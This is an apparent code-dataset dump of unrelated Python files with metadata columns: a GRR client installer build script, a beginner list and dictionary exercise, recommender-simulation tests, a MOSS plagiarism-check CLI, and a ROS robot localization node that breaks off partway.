default=default_package,
help="The packaging format to use when building a Linux client.")
# Initialize sub parsers and their arguments.
subparsers = parser.add_subparsers(
title="subcommands", dest="subparser_name", description="valid subcommands")
# Build arguments.
parser_build = subparsers.add_parser(
"build", help="Build a client from source.")
parser_repack = subparsers.add_parser(
"repack", help="Repack a zip file into an installer (Only useful when "
"signing).")
parser_repack.add_argument("--template", default=None,
help="The template zip file to repack.")
parser_repack.add_argument("--output", default=None,
help="The path to write the output installer.")
parser_repack.add_argument("--outputdir", default="",
help="The directory to which we should write the "
"output installer. Installers will be named "
"automatically from config options. Incompatible"
" with --output")
parser_repack.add_argument("--debug_build", action="store_true", default=False,
help="Create a debug client.")
parser_repack.add_argument("-p", "--plugins", default=[], nargs="+",
help="Additional python files that will be loaded "
"as custom plugins.")
parser_deploy = subparsers.add_parser(
"deploy", help="Build a deployable self installer from a package.")
parser_deploy.add_argument("--template", default=None,
help="The template zip file to deploy.")
parser_deploy.add_argument("--templatedir", default="",
help="Directory containing template zip files to "
"repack. Incompatible with --template")
parser_deploy.add_argument("--output", default=None,
help="The path to write the output installer.")
parser_deploy.add_argument("--outputdir", default="",
help="The directory to which we should write the "
"output installer. Installers will be named "
"automatically from config options. Incompatible"
" with --output")
parser_deploy.add_argument("-p", "--plugins", default=[], nargs="+",
help="Additional python files that will be loaded "
"as custom plugins.")
parser_deploy.add_argument("--debug_build", action="store_true", default=False,
help="Create a debug client.")
parser_buildanddeploy = subparsers.add_parser(
"buildanddeploy",
help="Build and deploy clients for multiple labels and architectures.")
parser_buildanddeploy.add_argument("--template", default=None,
help="The template zip file to repack, if "
"none is specified we will build it.")
args = parser.parse_args()
def GetBuilder(context):
"""Get the appropriate builder based on the selected flags."""
try:
if args.platform == "darwin":
context = ["Platform:Darwin"] + context
builder_obj = builders.DarwinClientBuilder
elif args.platform == "windows":
context = ["Platform:Windows"] + context
builder_obj = builders.WindowsClientBuilder
elif args.platform == "linux":
if args.package_format == "deb":
context = ["Platform:Linux"] + context
builder_obj = builders.LinuxClientBuilder
elif args.package_format == "rpm":
context = ["Platform:Linux", "Target:LinuxRpm"] + context
builder_obj = builders.CentosClientBuilder
else:
parser.error("Couldn't guess packaging format for: %s" %
platform.linux_distribution()[0])
else:
parser.error("Unsupported build platform: %s" % args.platform)
except AttributeError:
raise RuntimeError("Unable to build for platform %s when running "
"on current platform." % args.platform)
return builder_obj(context=context)
def GetDeployer(context):
"""Get the appropriate client deployer based on the selected flags."""
if args.platform == "darwin":
context = ["Platform:Darwin"] + context
deployer_obj = build.DarwinClientDeployer
elif args.platform == "windows":
context = ["Platform:Windows"] + context
deployer_obj = build.WindowsClientDeployer
elif args.platform == "linux":
if args.package_format == "deb":
context = ["Platform:Linux"] + context
deployer_obj = build.LinuxClientDeployer
else:
context = ["Platform:Linux", "Target:LinuxRpm"] + context
deployer_obj = build.CentosClientDeployer
else:
parser.error("Unsupported build platform: %s" % args.platform)
return deployer_obj(context=context)
def TemplateInputFilename(context):
"""Build template file name from config."""
if args.templatedir:
filename = config_lib.CONFIG.Get("PyInstaller.template_filename",
context=context)
return os.path.join(args.templatedir, filename)
return None
def BuildAndDeploy(context):
"""Run build and deploy to create installers."""
# ISO 8601 date
timestamp = time.strftime("%Y-%m-%dT%H:%M:%S%z")
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
# Output directory like: 2015-02-13T21:48:47-0800/linux_amd64_deb/
spec = "_".join((args.platform, args.arch, args.package_format))
output_dir = os.path.join(config_lib.CONFIG.Get(
"ClientBuilder.executables_path", context=context), timestamp, spec)
# If we weren't passed a template, build one
if args.template:
template_path = args.template
else:
template_path = os.path.join(output_dir, config_lib.CONFIG.Get(
"PyInstaller.template_filename", context=context))
builder_obj = GetBuilder(context)
builder_obj.MakeExecutableTemplate(output_file=template_path)
# Get the list of contexts which we should be building.
context_list = config_lib.CONFIG.Get("ClientBuilder.BuildTargets")
logging.info("Building installers for: %s", context_list)
config_orig = config_lib.CONFIG.ExportState()
deployed_list = []
for deploycontext in context_list:
# Add the settings for this context
for newcontext in deploycontext.split(","):
config_lib.CONFIG.AddContext(newcontext)
context.append(newcontext)
try:
# If the ClientBuilder.target_platforms doesn't match our environment,
# skip.
if not config_lib.CONFIG.MatchBuildContext(args.platform, args.arch,
args.package_format):
continue
deployer = GetDeployer(context)
# Make a nicer filename out of the context string.
context_filename = deploycontext.replace(
"AllPlatforms Context,", "").replace(",", "_").replace(" ", "_")
deployed_list.append(context_filename)
output_filename = os.path.join(
output_dir, context_filename,
config_lib.CONFIG.Get("ClientBuilder.output_filename",
context=deployer.context))
logging.info("Deploying %s as %s with labels: %s", deploycontext,
config_lib.CONFIG.Get(
"Client.name", context=deployer.context),
config_lib.CONFIG.Get(
"Client.labels", context=deployer.context))
deployer.MakeDeployableBinary(template_path, output_filename)
finally:
# Remove the custom settings for the next deploy
for newcontext in deploycontext.split(","):
context.remove(newcontext)
config_lib.ImportConfigManger(config_orig)
logging.info("Complete, installers for %s are in %s", deployed_list,
output_dir)
def main(_):
"""Launch the appropriate builder."""
config_lib.CONFIG.AddContext(
"ClientBuilder Context",
"Context applied when we run the client builder script.")
startup.ClientInit()
# Make sure we have all the secondary configs since they may be set under the
# ClientBuilder Context
for secondconfig in config_lib.CONFIG["ConfigIncludes"]:
config_lib.CONFIG.LoadSecondaryConfig(secondconfig)
# Use basic console output logging so we can see what is happening.
logger = logging.getLogger()
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
logger.handlers = [handler]
# The following is used to change the identity of the builder based on the
# target platform.
context = flags.FLAGS.context
if args.arch == "amd64":
context.append("Arch:amd64")
else:
context.append("Arch:i386")
if args.subparser_name == "build":
builder_obj = GetBuilder(context)
builder_obj.MakeExecutableTemplate()
elif args.subparser_name == "repack":
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
if args.debug_build:
context += ["DebugClientBuild Context"]
deployer = GetDeployer(context)
output_filename = os.path.join(
args.outputdir, config_lib.CONFIG.Get(
"ClientBuilder.output_filename", context=deployer.context))
deployer.RepackInstaller(open(args.template, "rb").read(), args.output or
output_filename)
elif args.subparser_name == "deploy":
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
if args.debug_build:
context += ["DebugClientBuild Context"]
deployer = GetDeployer(context)
template_path = (args.template or TemplateInputFilename(deployer.context) or
config_lib.CONFIG.Get("ClientBuilder.template_path",
context=deployer.context))
# If neither output filename or output directory is specified,
# use the default location from the config file.
output = None
if args.output:
output = args.output
elif args.outputdir:
# If output filename isn't specified, write to args.outputdir with a
# .deployed extension so we can distinguish it from repacked binaries.
filename = ".".join(
(config_lib.CONFIG.Get("ClientBuilder.output_filename",
context=deployer.context), "deployed"))
output = os.path.join(args.outputdir, filename)
deployer.MakeDeployableBinary(template_path, output)
elif args.subparser_name == "buildanddeploy":
BuildAndDeploy(context)
if __name__ == "__main__":
flags.StartMain(main)
| #!/usr/bin/env python
"""This tool builds or repacks the client binaries.
This handles invocations for the build across the supported platforms including
handling Visual Studio, pyinstaller and other packaging mechanisms.
"""
import logging
import os
import platform
import time
# pylint: disable=unused-import
from grr.client import client_plugins
# pylint: enable=unused-import
from grr.lib import build
from grr.lib import builders
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import startup
parser = flags.PARSER
# Guess which arch we should be building based on where we are running.
if platform.architecture()[0] == "32bit":
default_arch = "i386"
else:
default_arch = "amd64"
default_platform = platform.system().lower()
parser.add_argument(
"--platform", choices=["darwin", "linux", "windows"],
default=default_platform,
help="The platform to build or repack for. This will default to "
"the current platform: %s." % platform.system())
parser.add_argument(
"--arch", choices=["amd64", "i386"],
default=default_arch,
help="The architecture to build or repack for.")
# Guess which package format we should be building based on where we are
# running.
if default_platform == "linux":
distro = platform.linux_distribution()[0]
if distro in ["Ubuntu", "debian"]:
default_package = "deb"
elif distro in ["CentOS Linux", "CentOS", "centos", "redhat", "fedora"]:
default_package = "rpm"
else:
default_package = None
elif default_platform == "darwin":
default_package = "dmg"
elif default_platform == "windows":
default_package = "exe"
parser.add_argument(
"--package_format", choices=["deb", "rpm"],
default=default_package,
help="The packaging format to use when building a Linux client.")
# Initialize sub parsers and their arguments.
subparsers = parser.add_subparsers(
title="subcommands", dest="subparser_name", description="valid subcommands")
# Build arguments.
parser_build = subparsers.add_parser(
"build", help="Build a client from source.")
parser_repack = subparsers.add_parser(
"repack", help="Repack a zip file into an installer (Only useful when "
"signing).")
parser_repack.add_argument("--template", default=None,
help="The template zip file to repack.")
parser_repack.add_argument("--output", default=None,
help="The path to write the output installer.")
parser_repack.add_argument("--outputdir", default="",
help="The directory to which we should write the "
"output installer. Installers will be named "
"automatically from config options. Incompatible"
" with --output")
parser_repack.add_argument("--debug_build", action="store_true", default=False,
help="Create a debug client.")
parser_repack.add_argument("-p", "--plugins", default=[], nargs="+",
help="Additional python files that will be loaded "
"as custom plugins.")
parser_deploy = subparsers.add_parser(
"deploy", help="Build a deployable self installer from a package.")
parser_deploy.add_argument("--template", default=None,
help="The template zip file to deploy.")
parser_deploy.add_argument("--templatedir", default="",
help="Directory containing template zip files to "
"repack. Incompatible with --template")
parser_deploy.add_argument("--output", default=None,
help="The path to write the output installer.")
parser_deploy.add_argument("--outputdir", default="",
help="The directory to which we should write the "
"output installer. Installers will be named "
"automatically from config options. Incompatible"
" with --output")
parser_deploy.add_argument("-p", "--plugins", default=[], nargs="+",
help="Additional python files that will be loaded "
"as custom plugins.")
parser_deploy.add_argument("--debug_build", action="store_true", default=False,
help="Create a debug client.")
parser_buildanddeploy = subparsers.add_parser(
"buildanddeploy",
help="Build and deploy clients for multiple labels and architectures.")
parser_buildanddeploy.add_argument("--template", default=None,
help="The template zip file to repack, if "
"none is specified we will build it.")
args = parser.parse_args()
def GetBuilder(context):
"""Get the appropriate builder based on the selected flags."""
try:
if args.platform == "darwin":
context = ["Platform:Darwin"] + context
builder_obj = builders.DarwinClientBuilder
elif args.platform == "windows":
context = ["Platform:Windows"] + context
builder_obj = builders.WindowsClientBuilder
elif args.platform == "linux":
if args.package_format == "deb":
context = ["Platform:Linux"] + context
builder_obj = builders.LinuxClientBuilder
elif args.package_format == "rpm":
context = ["Platform:Linux", "Target:LinuxRpm"] + context
builder_obj = builders.CentosClientBuilder
else:
parser.error("Couldn't guess packaging format for: %s" %
platform.linux_distribution()[0])
else:
parser.error("Unsupported build platform: %s" % args.platform)
except AttributeError:
raise RuntimeError("Unable to build for platform %s when running "
"on current platform." % args.platform)
return builder_obj(context=context)
def GetDeployer(context):
"""Get the appropriate client deployer based on the selected flags."""
if args.platform == "darwin":
context = ["Platform:Darwin"] + context
deployer_obj = build.DarwinClientDeployer
elif args.platform == "windows":
context = ["Platform:Windows"] + context
deployer_obj = build.WindowsClientDeployer
elif args.platform == "linux":
if args.package_format == "deb":
context = ["Platform:Linux"] + context
deployer_obj = build.LinuxClientDeployer
else:
context = ["Platform:Linux", "Target:LinuxRpm"] + context
deployer_obj = build.CentosClientDeployer
else:
parser.error("Unsupported build platform: %s" % args.platform)
return deployer_obj(context=context)
def TemplateInputFilename(context):
"""Build template file name from config."""
if args.templatedir:
filename = config_lib.CONFIG.Get("PyInstaller.template_filename",
context=context)
return os.path.join(args.templatedir, filename)
return None
def BuildAndDeploy(context):
"""Run build and deploy to create installers."""
# ISO 8601 date
timestamp = time.strftime("%Y-%m-%dT%H:%M:%S%z")
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
# Output directory like: 2015-02-13T21:48:47-0800/linux_amd64_deb/
spec = "_".join((args.platform, args.arch, args.package_format))
output_dir = os.path.join(config_lib.CONFIG.Get(
"ClientBuilder.executables_path", context=context), timestamp, spec)
# If we weren't passed a template, build one
if args.template:
template_path = args.template
else:
template_path = os.path.join(output_dir, config_lib.CONFIG.Get(
"PyInstaller.template_filename", context=context))
builder_obj = GetBuilder(context)
builder_obj.MakeExecutableTemplate(output_file=template_path)
# Get the list of contexts which we should be building.
context_list = config_lib.CONFIG.Get("ClientBuilder.BuildTargets")
logging.info("Building installers for: %s", context_list)
config_orig = config_lib.CONFIG.ExportState()
deployed_list = []
for deploycontext in context_list:
# Add the settings for this context
for newcontext in deploycontext.split(","):
config_lib.CONFIG.AddContext(newcontext)
context.append(newcontext)
try:
# If the ClientBuilder.target_platforms doesn't match our environment,
# skip.
if not config_lib.CONFIG.MatchBuildContext(args.platform, args.arch,
args.package_format):
continue
deployer = GetDeployer(context)
# Make a nicer filename out of the context string.
context_filename = deploycontext.replace(
"AllPlatforms Context,", "").replace(",", "_").replace(" ", "_")
deployed_list.append(context_filename)
output_filename = os.path.join(
output_dir, context_filename,
config_lib.CONFIG.Get("ClientBuilder.output_filename",
context=deployer.context))
logging.info("Deploying %s as %s with labels: %s", deploycontext,
config_lib.CONFIG.Get(
"Client.name", context=deployer.context),
config_lib.CONFIG.Get(
"Client.labels", context=deployer.context))
deployer.MakeDeployableBinary(template_path, output_filename)
finally:
# Remove the custom settings for the next deploy
for newcontext in deploycontext.split(","):
context.remove(newcontext)
config_lib.ImportConfigManger(config_orig)
logging.info("Complete, installers for %s are in %s", deployed_list,
output_dir)
def main(_):
"""Launch the appropriate builder."""
config_lib.CONFIG.AddContext(
"ClientBuilder Context",
"Context applied when we run the client builder script.")
startup.ClientInit()
# Make sure we have all the secondary configs since they may be set under the
# ClientBuilder Context
for secondconfig in config_lib.CONFIG["ConfigIncludes"]:
config_lib.CONFIG.LoadSecondaryConfig(secondconfig)
# Use basic console output logging so we can see what is happening.
logger = logging.getLogger()
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
logger.handlers = [handler]
# The following is used to change the identity of the builder based on the
# target platform.
context = flags.FLAGS.context
if args.arch == "amd64":
context.append("Arch:amd64")
else:
context.append("Arch:i386")
if args.subparser_name == "build":
builder_obj = GetBuilder(context)
builder_obj.MakeExecutableTemplate()
elif args.subparser_name == "repack":
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
if args.debug_build:
context += ["DebugClientBuild Context"]
deployer = GetDeployer(context)
output_filename = os.path.join(
args.outputdir, config_lib.CONFIG.Get(
"ClientBuilder.output_filename", context=deployer.context))
deployer.RepackInstaller(open(args.template, "rb").read(), args.output or
output_filename)
elif args.subparser_name == "deploy":
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
if args.debug_build:
context += ["DebugClientBuild Context"]
deployer = GetDeployer(context)
template_path = (args.template or TemplateInputFilename(deployer.context) or
config_lib.CONFIG.Get("ClientBuilder.template_path",
context=deployer.context))
# If neither output filename or output directory is specified,
# use the default location from the config file.
output = None
if args.output:
output = args.output
elif args.outputdir:
# If output filename isn't specified, write to args.outputdir with a
# .deployed extension so we can distinguish it from repacked binaries.
filename = ".".join(
(config_lib.CONFIG.Get("ClientBuilder.output_filename",
context=deployer.context), "deployed"))
output = os.path.join(args.outputdir, filename)
deployer.MakeDeployableBinary(template_path, output)
elif args.subparser_name == "buildanddeploy":
BuildAndDeploy(context)
if __name__ == "__main__":
flags.StartMain(main)
| en | 0.851849 | #!/usr/bin/env python This tool builds or repacks the client binaries. This handles invocations for the build across the supported platforms including handling Visual Studio, pyinstaller and other packaging mechanisms. # pylint: disable=unused-import # pylint: enable=unused-import # Guess which arch we should be building based on where we are running. # Guess which package format we should be building based on where we are # running. # Initialize sub parsers and their arguments. # Build arguments. Get the appropriate builder based on the selected flags. Get the appropriate client deployer based on the selected flags. Build template file name from config. Run build and deploy to create installers. # ISO 8601 date # Output directory like: 2015-02-13T21:48:47-0800/linux_amd64_deb/ # If we weren't passed a template, build one # Get the list of contexts which we should be building. # Add the settings for this context # If the ClientBuilder.target_platforms doesn't match our environment, # skip. # Make a nicer filename out of the context string. # Remove the custom settings for the next deploy Launch the appropriate builder. # Make sure we have all the secondary configs since they may be set under the # ClientBuilder Context # Use basic console output logging so we can see what is happening. # The following is used to change the identity of the builder based on the # target platform. # If neither output filename or output directory is specified, # use the default location from the config file. # If output filename isn't specified, write to args.outputdir with a # .deployed extension so we can distinguish it from repacked binaries. | 2.3135 | 2 |
Greyatom-projects/code.py | naveena41/greyatom-python-for-data-science | 0 | 8055 | <gh_stars>0
# --------------
# Code starts here
# Create the lists
class_1 = ['<NAME>', '<NAME>', '<NAME>', '<NAME>']
class_2 = ['<NAME>', '<NAME>', '<NAME>']
# Concatenate both the strings
new_class = class_1+class_2
print(new_class)
# Append the list
new_class.append('<NAME>')
# Print updated list
print(new_class)
# Remove the element from the list
new_class.remove('<NAME>')
# Print the list
print(new_class)
# Create the Dictionary
courses = {"math": 65, "english": 70, "history": 80, "french": 70, "science":60}
# Slice the dict and stores the all subjects marks in variable
total = 65+70+80+70+60
print(total)
# Store the all the subject in one variable `Total`
# Print the total
# Insert percentage formula
percentage =float(total)*(100/500)
# Print the percentage
print(percentage)
# Create the Dictionary
mathematics = {"<NAME>" :78, "<NAME>" :95, "<NAME>" :65, "<NAME>" :50, "<NAME>" :70, "<NAME>" :66, "<NAME>" :75}
topper = max(mathematics,key = mathematics.get)
print(topper)
# Given string
print(topper.split())
# Create variable first_name
first_name = 'andrew'
# Create variable Last_name and store last two element in the list
Last_name ='ng'
# Concatenate the string
full_name = Last_name+' '+first_name
# print the full_name
print(full_name)
# print the name in upper case
certificate_name = full_name.upper()
print(certificate_name)
# Code ends here
| # --------------
# Code starts here
# Create the lists
class_1 = ['<NAME>', '<NAME>', '<NAME>', '<NAME>']
class_2 = ['<NAME>', '<NAME>', '<NAME>']
# Concatenate both the strings
new_class = class_1+class_2
print(new_class)
# Append the list
new_class.append('<NAME>')
# Print updated list
print(new_class)
# Remove the element from the list
new_class.remove('<NAME>')
# Print the list
print(new_class)
# Create the Dictionary
courses = {"math": 65, "english": 70, "history": 80, "french": 70, "science":60}
# Slice the dict and stores the all subjects marks in variable
total = 65+70+80+70+60
print(total)
# Store the all the subject in one variable `Total`
# Print the total
# Insert percentage formula
percentage =float(total)*(100/500)
# Print the percentage
print(percentage)
# Create the Dictionary
mathematics = {"<NAME>" :78, "<NAME>" :95, "<NAME>" :65, "<NAME>" :50, "<NAME>" :70, "<NAME>" :66, "<NAME>" :75}
topper = max(mathematics,key = mathematics.get)
print(topper)
# Given string
print(topper.split())
# Create variable first_name
first_name = 'andrew'
# Create variable Last_name and store last two element in the list
Last_name ='ng'
# Concatenate the string
full_name = Last_name+' '+first_name
# print the full_name
print(full_name)
# print the name in upper case
certificate_name = full_name.upper()
print(certificate_name)
# Code ends here | en | 0.597958 | # -------------- # Code starts here # Create the lists # Concatenate both the strings # Append the list # Print updated list # Remove the element from the list # Print the list # Create the Dictionary # Slice the dict and stores the all subjects marks in variable # Store the all the subject in one variable `Total` # Print the total # Insert percentage formula # Print the percentage # Create the Dictionary # Given string # Create variable first_name # Create variable Last_name and store last two element in the list # Concatenate the string # print the full_name # print the name in upper case # Code ends here | 4.204773 | 4 |
environments/recommenders/recsim_wrapper_test.py | jackblandin/ml-fairness-gym | 0 | 8056 | # coding=utf-8
# Copyright 2022 The ML Fairness Gym Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for recsim.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
import test_util
from environments.recommenders import recsim_wrapper
from recsim.environments import interest_exploration
class RecommenderTest(absltest.TestCase):
def test_interest_exploration_can_run(self):
env_config = {
'num_candidates': 5,
'slate_size': 2,
'resample_documents': False,
'seed': 100,
}
params = recsim_wrapper.Params(
recsim_env=interest_exploration.create_environment(env_config))
env = recsim_wrapper.RecsimWrapper(params)
test_util.run_test_simulation(env=env, stackelberg=True)
def test_interest_exploration_can_run_with_resampling(self):
env_config = {
'num_candidates': 5,
'slate_size': 2,
'resample_documents': True,
'seed': 100,
}
params = recsim_wrapper.Params(
recsim_env=interest_exploration.create_environment(env_config))
env = recsim_wrapper.RecsimWrapper(params)
test_util.run_test_simulation(env=env, stackelberg=True)
if __name__ == '__main__':
absltest.main()
| # coding=utf-8
# Copyright 2022 The ML Fairness Gym Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for recsim.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
import test_util
from environments.recommenders import recsim_wrapper
from recsim.environments import interest_exploration
class RecommenderTest(absltest.TestCase):
def test_interest_exploration_can_run(self):
env_config = {
'num_candidates': 5,
'slate_size': 2,
'resample_documents': False,
'seed': 100,
}
params = recsim_wrapper.Params(
recsim_env=interest_exploration.create_environment(env_config))
env = recsim_wrapper.RecsimWrapper(params)
test_util.run_test_simulation(env=env, stackelberg=True)
def test_interest_exploration_can_run_with_resampling(self):
env_config = {
'num_candidates': 5,
'slate_size': 2,
'resample_documents': True,
'seed': 100,
}
params = recsim_wrapper.Params(
recsim_env=interest_exploration.create_environment(env_config))
env = recsim_wrapper.RecsimWrapper(params)
test_util.run_test_simulation(env=env, stackelberg=True)
if __name__ == '__main__':
absltest.main()
| en | 0.839689 | # coding=utf-8 # Copyright 2022 The ML Fairness Gym Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 Tests for recsim.py. | 2.011801 | 2 |
moss_client_cli.py | mernst32/dl-searchcode-code | 0 | 8057 | import argparse
import csv
import os
from moss_client.core import submit_and_dl, parse_moss_reports
data_folder = 'data'
def handle_input(user_id, base_folder, parse, only_parse, join_file, batch):
global data_folder
abs_path = os.path.abspath(os.path.dirname(__file__))
root_data_folder = os.path.join(abs_path, data_folder)
if not os.path.exists(root_data_folder):
os.makedirs(root_data_folder)
report_links_file = os.path.join(root_data_folder, 'links_to_moss_reports.html')
report_csv_file = os.path.join(root_data_folder, 'moss_report.csv')
if not os.path.isabs(base_folder):
base_folder = os.path.join(abs_path, base_folder)
if len(join_file) > 0:
expected_keys = ["SC_Filepath", "Stackoverflow_Links"]
with open(join_file, mode='r', encoding='utf-8') as csv_file:
csv_reader = csv.DictReader(csv_file)
actual_keys = csv_reader.fieldnames
if expected_keys[0] != actual_keys[0] or expected_keys[1] != actual_keys[1]:
print("Error: Unexpected Headers! SC_Filepath and Stackoverflow_Links are required!")
return -1
if not only_parse:
submit_and_dl(user_id, base_folder, report_links_file, batch)
if parse or only_parse:
print("Parsing the moss reports...")
parse_moss_reports(report_links_file, report_csv_file, join_file)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="MOSS CLI client for submitting java files to the service and downloading the report from the "
"service locally. Will go through the sub folders of the given folder and submit the java files "
"for plagiarism checks and download the reports locally, creating a linking file in the process")
parser.add_argument('user_id', metavar='U', nargs=1, help="Your user-id for the MOSS service.")
parser.add_argument('folder', metavar='F', nargs=1, help="The folder whose contents you want to submit.")
parser.add_argument('-p', '--parse', action='store_true', help="Parses the moss reports into a csv file.")
parser.add_argument('-o', '--only-parse', action='store_true',
help="Only parses the local moss reports and does not submit files and download the reports. "
"Requires the reports and the links_to_reports html file created normally by this app.")
parser.add_argument('-j', '--join-file', nargs=1, default=[""],
help="When the parse or only-parse option is given, joins the parsed data with the parsed data.")
parser.add_argument('-b', '--batch-mode', action='store_true',
help="Only submits a 100 folders to the Moss Service, also looks for already processed folders so "
"that it does not submit those again.")
args = parser.parse_args()
handle_input(args.user_id[0], args.folder[0], args.parse, args.only_parse, args.join_file[0], args.batch_mode)
| import argparse
import csv
import os
from moss_client.core import submit_and_dl, parse_moss_reports
data_folder = 'data'
def handle_input(user_id, base_folder, parse, only_parse, join_file, batch):
global data_folder
abs_path = os.path.abspath(os.path.dirname(__file__))
root_data_folder = os.path.join(abs_path, data_folder)
if not os.path.exists(root_data_folder):
os.makedirs(root_data_folder)
report_links_file = os.path.join(root_data_folder, 'links_to_moss_reports.html')
report_csv_file = os.path.join(root_data_folder, 'moss_report.csv')
if not os.path.isabs(base_folder):
base_folder = os.path.join(abs_path, base_folder)
if len(join_file) > 0:
expected_keys = ["SC_Filepath", "Stackoverflow_Links"]
with open(join_file, mode='r', encoding='utf-8') as csv_file:
csv_reader = csv.DictReader(csv_file)
actual_keys = csv_reader.fieldnames
if expected_keys[0] != actual_keys[0] or expected_keys[1] != actual_keys[1]:
print("Error: Unexpected Headers! SC_Filepath and Stackoverflow_Links are required!")
return -1
if not only_parse:
submit_and_dl(user_id, base_folder, report_links_file, batch)
if parse or only_parse:
print("Parsing the moss reports...")
parse_moss_reports(report_links_file, report_csv_file, join_file)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="MOSS CLI client for submitting java files to the service and downloading the report from the "
"service locally. Will go through the sub folders of the given folder and submit the java files "
"for plagiarism checks and download the reports locally, creating a linking file in the process")
parser.add_argument('user_id', metavar='U', nargs=1, help="Your user-id for the MOSS service.")
parser.add_argument('folder', metavar='F', nargs=1, help="The folder whose contents you want to submit.")
parser.add_argument('-p', '--parse', action='store_true', help="Parses the moss reports into a csv file.")
parser.add_argument('-o', '--only-parse', action='store_true',
help="Only parses the local moss reports and does not submit files and download the reports. "
"Requires the reports and the links_to_reports html file created normally by this app.")
parser.add_argument('-j', '--join-file', nargs=1, default=[""],
help="When the parse or only-parse option is given, joins the parsed data with the parsed data.")
parser.add_argument('-b', '--batch-mode', action='store_true',
help="Only submits a 100 folders to the Moss Service, also looks for already processed folders so "
"that it does not submit those again.")
args = parser.parse_args()
handle_input(args.user_id[0], args.folder[0], args.parse, args.only_parse, args.join_file[0], args.batch_mode)
| none | 1 | 2.836682 | 3 |
|
catkin_ws/src/localization/src/localization_node.py | DiegoOrtegoP/Software | 12 | 8058 | <gh_stars>10-100
#!/usr/bin/env python
import rospy
#from apriltags_ros.msg import AprilTagDetectionArray
from duckietown_msgs.msg import AprilTagsWithInfos
import tf2_ros
from tf2_msgs.msg import TFMessage
import tf.transformations as tr
from geometry_msgs.msg import Transform, TransformStamped
import numpy as np
from localization import PoseAverage
from visualization_msgs.msg import Marker
# Localization Node
# Author: <NAME>
# Inputs: apriltags/duckietown_msgs/AprilTags - A list of april tags in a camera frame
# Outputs: pose2d/duckietown_msgs/Pose2dStamped - The estimated pose of the robot in the world frame in 2D coordinates
# pose3d/geometry_msgs/PoseStamped - The estimated pose of the robot in the world frame in 3D coordinates
class LocalizationNode(object):
def __init__(self):
self.node_name = 'localization_node'
# Constants
self.world_frame = "world"
self.duckiebot_frame = "duckiebot"
self.duckiebot_lifetime = self.setupParam("~duckiebot_lifetime", 5) # The number of seconds to keep the duckiebot alive bewtween detections
self.highlight_lifetime = self.setupParam("~highlight_lifetime", 3) # The number of seconds to keep a sign highlighted after a detection
# Setup the publishers and subscribers
self.sub_april = rospy.Subscriber("~apriltags", AprilTagsWithInfos, self.tag_callback)
self.pub_tf = rospy.Publisher("/tf", TFMessage, queue_size=1, latch=True)
self.pub_rviz = rospy.Publisher("/sign_highlights", Marker, queue_size=1, latch=True)
# Setup the transform listener
self.tfbuf = tf2_ros.Buffer()
self.tfl = tf2_ros.TransformListener(self.tfbuf)
# Use a timer to make the duckiebot disappear
self.lifetimer = rospy.Time.now()
self.publish_duckie_marker()
rospy.loginfo("[%s] has started", self.node_name)
def tag_callback(self, msg_tag):
# Listen for the transform of the tag in the world
avg = PoseAverage.PoseAverage()
for tag in msg_tag.detections:
try:
Tt_w = self.tfbuf.lookup_transform(self.world_frame, "tag_{id}".format(id=tag.id), rospy.Time(), rospy.Duration(1))
Mtbase_w=self.transform_to_matrix(Tt_w.transform)
Mt_tbase = tr.concatenate_matrices(tr.translation_matrix((0,0,0.17)), tr.euler_matrix(0,0,np.pi))
Mt_w = tr.concatenate_matrices(Mtbase_w,Mt_tbase)
Mt_r=self.pose_to_matrix(tag.pose)
Mr_t=np.linalg.inv(Mt_r)
Mr_w=np.dot(Mt_w,Mr_t)
Tr_w = self.matrix_to_transform(Mr_w)
avg.add_pose(Tr_w)
self.publish_sign_highlight(tag.id)
except(tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException) as ex:
rospy.logwarn("Error looking up transform for tag_%s", tag.id)
rospy.logwarn(ex.message)
Tr_w = avg.get_average() # Average of the opinions
# Broadcast the robot transform
if Tr_w is not None:
# Set the z translation, and x and y rotations to 0
Tr_w.translation.z = 0
rot = Tr_w.rotation
rotz=tr.euler_from_quaternion((rot.x, rot.y, rot.z, rot.w))[2]
(rot.x, rot.y, rot.z, rot.w) = tr.quaternion_from_euler(0, 0, rotz)
T = TransformStamped()
T.transform = Tr_w
T.header.frame_id = self.world_frame
T.header.stamp = rospy.Time.now()
T.child_frame_id = self.duckiebot_frame
self.pub_tf.publish(TFMessage([T]))
self.lifetimer = rospy.Time.now()
def publish_duckie_marker(self):
# Publish a duckiebot transform far away unless the timer was reset
rate = rospy.Rate(10)
while not rospy.is_shutdown():
rate.sleep()
